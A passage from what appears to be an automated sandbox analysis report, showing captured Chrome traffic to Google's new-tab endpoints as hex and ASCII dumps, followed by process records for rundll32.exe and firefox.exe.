                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:10 UTC707INData Raw: 74 65 73 22 2c 22 6d 6f 6f 6e 20 6d 61 72 73 20 6f 63 63 75 6c 74 61 74 69 6f 6e 22 2c 22 73 62 20 6d 6f 77 69 6e 67 20 67 6f 66 75 6e 64 6d 65 20 62 65 74 68 22 2c 22 65 61 73 74 20 74 65 6e 6e 65 73 73 65 65 20 73 63 68 6f 6f 6c 20 63 6c 6f 73 69 6e 67 73 22 2c 22 6a 70 6d 6f 72 67 61 6e 20 63 68 61 73 65 20 62 61 6e 6b 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: tes","moon mars occultation","sb mowing gofundme beth","east tennessee school closings","jpmorgan chase bank"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","goo
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      1192.168.2.1649715216.58.206.364436592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:10 UTC530OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Version: 714120572
                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:45:10 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC372INData Raw: 32 31 32 35 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 2125)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 34 35 2c 33 37 30 30 39 34 32 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700245,3700942,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1171INData Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Md\u003dglobalThis.trustedTypes;_.Nd\u003dclass{constructor
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC508INData Raw: 31 66 35 0d 0a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 58 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 58 64 5c 75 30 30 33 64 57 64 28 29 29 3b 72 65 74 75 72 6e 20 58 64 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 59 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 5a 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1f5b,createScript:b,createScriptURL:b})}catch(b){}return a};_.Yd\u003dfunction(){Xd\u003d\u003d\u003dvoid 0\u0026\u0026(Xd\u003dWd());return Xd};\n_.$d\u003dfunction(a){const b\u003d_.Yd();return new _.Zd(b?b.createScriptURL(a):a)};_.ae\u003dfunction(a)
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1390INData Raw: 38 30 30 30 0d 0a 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 66 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 8000\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.fe\u003dfunction(a){var b\u003d_.
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC1390INData Raw: 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6f 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 65 5b 64 5d 2c 63 29 3a 5f 2e 55 64 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 55 64 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6f 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:oe.hasOwnProperty(d)?a.setAttribute(oe[d],c):_.Ud(d,\"aria-\")||_.Ud(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};oe\u003d{cellpadding:\"cellPadding\",cellspacing:\"


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      2192.168.2.1649716216.58.206.364436592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:10 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Version: 714120572
                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:45:10 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                                                      2025-01-14 19:45:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                                                                                      Start time:14:44:58
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7c04f0000
                                                                                                                                                                                                                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:04
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7916a0000
                                                                                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:05
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7916a0000
                                                                                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
